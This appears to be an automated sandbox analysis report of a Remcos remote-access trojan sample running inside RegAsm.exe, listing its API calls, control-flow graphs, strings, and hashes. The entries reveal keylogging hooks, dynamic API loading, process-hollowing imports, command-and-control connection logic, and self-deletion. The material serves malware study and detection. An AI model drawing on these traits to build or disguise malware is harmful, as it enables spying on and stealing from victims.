                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                        • API String ID: 4236061018-3687161714
                                                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 1288 40a2b8-40a2cf 1289 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1288->1289 1290 40a333-40a343 GetMessageA 1288->1290 1289->1290 1293 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1289->1293 1291 40a345-40a35d TranslateMessage DispatchMessageA 1290->1291 1292 40a35f 1290->1292 1291->1290 1291->1292 1294 40a361-40a366 1292->1294 1293->1294
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • GetMessageA.USER32 ref: 0040A33B
                                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                                        • DispatchMessageA.USER32 ref: 0040A355
                                                        Strings
                                                        • Keylogger initialization failure: error , xrefs: 0040A301
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                        • String ID: Keylogger initialization failure: error
                                                        • API String ID: 3219506041-952744263
                                                        • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                        • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                          • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                                          • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                        • ExitProcess.KERNEL32 ref: 0040F8CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                        • String ID: 4.9.4 Pro$override$pth_unenc
                                                        • API String ID: 2281282204-930821335
                                                        • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                        • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,007AA308), ref: 00433849
                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                        • String ID:
                                                        • API String ID: 1815803762-0
                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                        Strings
                                                        • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSystem
                                                        • String ID: GetSystemTimePreciseAsFileTime
                                                        • API String ID: 2086374402-595813830
                                                        • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                        • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                        • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                        • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                        • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                        • Instruction Fuzzy Hash:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 
call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->183 184 40ee0f-40ee19 call 409057 180->184 193 40ee1e-40ee42 call 40247c call 434798 183->193 184->193 211 40ee51 193->211 212 40ee44-40ee4f call 436e90 193->212 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 356 40f159-40f16c call 401e65 call 401fab 346->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 
380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 409 40f279-40f280 404->409 410 40f26d-40f277 CreateThread 404->410 405->404 413 40f282-40f285 409->413 414 40f28e 409->414 410->409 415 40f287-40f28c 413->415 416 40f2cc-40f2df call 401fab call 4134ff 413->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 414->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                        APIs
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                        • API String ID: 2830904901-1084268468
                                                        • Opcode ID: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
                                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                        • Opcode Fuzzy Hash: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
                                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 582 415aa3-415ab5 call 404e26 call 4021fa 561->582 566->582 583 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->583 567->582 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 582->597 598 415add-415ae5 call 401e8d 582->598 648 415380-41538d call 405aa6 583->648 649 415392-4153b9 call 401fab call 4135a6 583->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 
406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->582
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$ErrorLastLocalTime
                                                        • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                        • API String ID: 524882891-4102665942
                                                        • Opcode ID: ab28f9adf8b547a1f2ffb6b62a3bc060c3e60cb7c1f814ea2404530d0922b45b
                                                        • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                        • Opcode Fuzzy Hash: ab28f9adf8b547a1f2ffb6b62a3bc060c3e60cb7c1f814ea2404530d0922b45b
                                                        • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 925 414d86-414dc2 926 414dc8-414ddd GetSystemDirectoryA 925->926 927 414edd-414ee8 925->927 928 414ed3 926->928 929 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 926->929 928->927 934 414e31-414e3b GetProcAddress 929->934 935 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 929->935 936 414e42-414e44 934->936 937 414e3d-414e40 FreeLibrary 934->937 948 414e82-414e8c GetProcAddress 935->948 949 414ecf-414ed2 935->949 936->935 939 414e97 936->939 937->936 941 414e99-414eaa GetProcAddress 939->941 943 414eb4-414eb7 FreeLibrary 941->943 944 414eac-414eb0 941->944 947 414eb9-414ebb 943->947 944->941 946 414eb2 944->946 946->947 947->949 950 414ebd-414ecd 947->950 951 414e93-414e95 948->951 952 414e8e-414e91 FreeLibrary 948->952 949->928 950->949 950->950 951->939 951->949 952->951
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                        • API String ID: 2490988753-744132762
                                                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • Sleep.KERNEL32(00001388), ref: 0040A740
                                                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                        • API String ID: 3795512280-1152054767
                                                        • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                        • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
